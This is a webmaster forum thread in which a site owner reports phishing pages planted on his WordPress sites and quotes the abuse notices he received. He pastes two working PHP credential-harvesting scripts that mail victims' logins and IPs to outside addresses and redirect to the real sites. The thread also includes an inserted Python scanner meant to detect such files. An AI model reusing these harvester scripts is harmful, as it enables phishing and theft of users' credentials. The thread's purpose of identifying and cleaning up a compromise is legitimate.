Old 08-24-2015, 01:49 AM   #1
hausarzt
Phishlabs? Who are they?

I received strange emails in the past for almost every one of my sites:

Quote:
Our company investigates computer crime incidents on behalf of banks and other companies.

We have discovered that your web site, hottiescam.com, has been attacked by criminals. These criminals created a fake web page which appears to copy a Spark Networks site.


http:// my website .com/services/mchsvjbsuvkjn.html



If possible, please provide the following information to assist our investigation:

- Web server and FTP server log files for the past several days
- Copies of all phishing files, hack tools, or other hacker files

Finally, we kindly request that you disable or remove the phishing files as soon as possible.

We recommend taking the following actions to secure the web site and prevent the attackers from returning:

- Change your web hosting password
- Update your web applications including CMS, blog, ecommerce, and other applications (and all add-on modules/components/plugins)
- Search all of your web directories for suspicious files and investigate any found
- Scan the computer from which you login to your web hosting control panel or ftp server with anti-virus software

If you believe we have contacted you in error, or if we can provide any assistance with this incident, please contact us and let us know.

Thank you for your assistance with this matter,

Eric George
PhishLabs Security Operations
[email protected]
+1.202.386.6001
http://www.phishlabs.com


Another one through my abuse contact from my hosting:

Quote:
Our company investigates computer crime incidents on behalf of banks and other companies.

We have discovered that your web site, www.dirtycamsluts.com, has been attacked by criminals. These criminals created a fake web page which appears to copy a Spark Networks site.


hXXp www [dot] MY WEBSITE [dot] com/jimjim/mchsvjbsuvkjn [dot] html
hXXp www [dot] MY WEBSITE [dot] com/jimjim/login [dot] php



If possible, please provide the following information to assist our investigation:

- Web server and FTP server log files for the past several days
- Copies of all phishing files, hack tools, or other hacker files

Finally, we kindly request that you disable or remove the phishing files as soon as possible.

We recommend taking the following actions to secure the web site and prevent the attackers from returning:

- Change your web hosting password
- Update your web applications including CMS, blog, ecommerce, and other applications (and all add-on modules/components/plugins)
- Search all of your web directories for suspicious files and investigate any found
- Scan the computer from which you login to your web hosting control panel or ftp server with anti-virus software

If you believe we have contacted you in error, or if we can provide any assistance with this incident, please contact us and let us know.

Thank you for your assistance with this matter,

Matt Twitty
PhishLabs Security Operations
[email protected]
+1.202.386.6001
http://www.phishlabs.com
Sites are running on WordPress. I just checked the sites and found some strange folders in some installs, so I deleted them. Does anyone else have this "problem"?
__________________
I know, my english is bad. But your german might be even worse
Old 08-24-2015, 01:56 AM   #2
j3rkules
Never heard of them.
Old 08-24-2015, 03:18 AM   #3
hausarzt
Alright, now Google Webmaster Tools told me that my sites are reported as phishing sites.

I removed all suspicious files/folders from my sites.


A file called buff.php contained this:

http://pastebin.com/jJ3QS7UH
READ AT YOUR OWN RISK

My Avast goes wild on this file. Can anyone read/translate this?

Some fake-login php-files:

Quote:
<?php
$ip = getenv("REMOTE_ADDR");
$data=date("D M d, Y g:i a");
$message .= "User: ".$_POST['loginemail']."\n";
$message .= "PassWord: " .$_POST['password']."\n";
$message .= "Country: $ip\n";
$message .= "Date: $data\n";

$recipient = "[email protected]";
$subject = "Christian Mingle | $ip";
$headers = "From: Rashyd Bohaty <[email protected]>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);

header("Location: http://www.christianmingle.com/");
?>

Quote:
<?php
$ip = getenv("REMOTE_ADDR");

$data=date("D M d, Y g:i a");
$message .= "====== Hacked By OBO ======\n";
$message .= "User: ".$_POST['username']."\n";
$message .= "PassWord: " .$_POST['passwd']."\n";
$message .= "Country: $ip\n";
$message .= "Date: $data\n";
$message .= "====== ® Trademark 2015 ======\n";

$recipient = "[email protected]";
$recipient2 = "[email protected]";
$subject = "Y!Logs $ip";
$headers = "From: Rashyd Bohaty <[email protected]>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);
mail($recipient2,$subject,$message,$headers);
header("Location: http://www.yahoomail.com");

?>
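Added example (not part of the original thread and not code from any poster): a small Python scanner for the "search all of your web directories for suspicious files" step in the quoted emails, flagging PHP files that combine the traits both fake-login scripts above share. The trait names, the threshold of 3 and both sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Traits both fake-login scripts share (names are illustrative assumptions).
# \bmail\( is deliberate: it does not match WordPress's own wp_mail(.
TRAITS = {
    "reads_post_credential": re.compile(
        r"\$_POST\s*\[\s*['\"][^'\"]*(pass|pwd|login|user)[^'\"]*['\"]\s*\]", re.I),
    "calls_mail": re.compile(r"\bmail\s*\(", re.I),
    "redirects_offsite": re.compile(r"header\s*\(\s*['\"]Location:\s*https?://", re.I),
    "logs_remote_addr": re.compile(r"REMOTE_ADDR"),
}

def score_php(source):
    """Return the names of the traits present in one PHP source string."""
    return [name for name, rx in TRAITS.items() if rx.search(source)]

def scan_tree(root, threshold=3):
    """Map relative path -> traits for every *.php under root with >= threshold traits."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        traits = score_php(path.read_text(errors="replace"))
        if len(traits) >= threshold:
            hits[path.relative_to(root).as_posix()] = traits
    return hits

# Constructed sample: trimmed to the traits only, placeholder redirect target.
HARVESTER = '''<?php
$ip = getenv("REMOTE_ADDR");
$message .= "User: ".$_POST['username']." PassWord: ".$_POST['passwd'];
mail($recipient, $subject, $message, $headers);
header("Location: http://www.example.com/");
?>'''

# Constructed sample: an ordinary contact form that should not be flagged.
CONTACT_FORM = '''<?php
$body = "Message: ".$_POST['comment'];
mail("owner@example.org", "Contact form", $body);
?>'''

def demo():
    # Write both samples into a temporary web root and scan it.
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "jimjim").mkdir()
        (Path(root) / "jimjim" / "login.php").write_text(HARVESTER)
        (Path(root) / "contact.php").write_text(CONTACT_FORM)
        return scan_tree(root)
```

On a real site, call scan_tree() on the web root and review each hit by hand; obfuscated files such as the buff.php mentioned above will not show these plain-text traits and need a separate check.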
Old 08-24-2015, 04:35 AM   #4
MrGusMuller
it was sending the user/password to the hackers' email :/
change them all!!
__________________
StagCMS - Adult CMS - user friendly adult content management system - speed up your websites with no SQL connections
ICQ: 63*23*43*113

Old 08-24-2015, 04:38 AM   #5
MrGusMuller
try Sucuri Security ? WAF, DDoS Protection, Malware Removal, WordPress Security, and Blacklist Removal
they have helped some friends...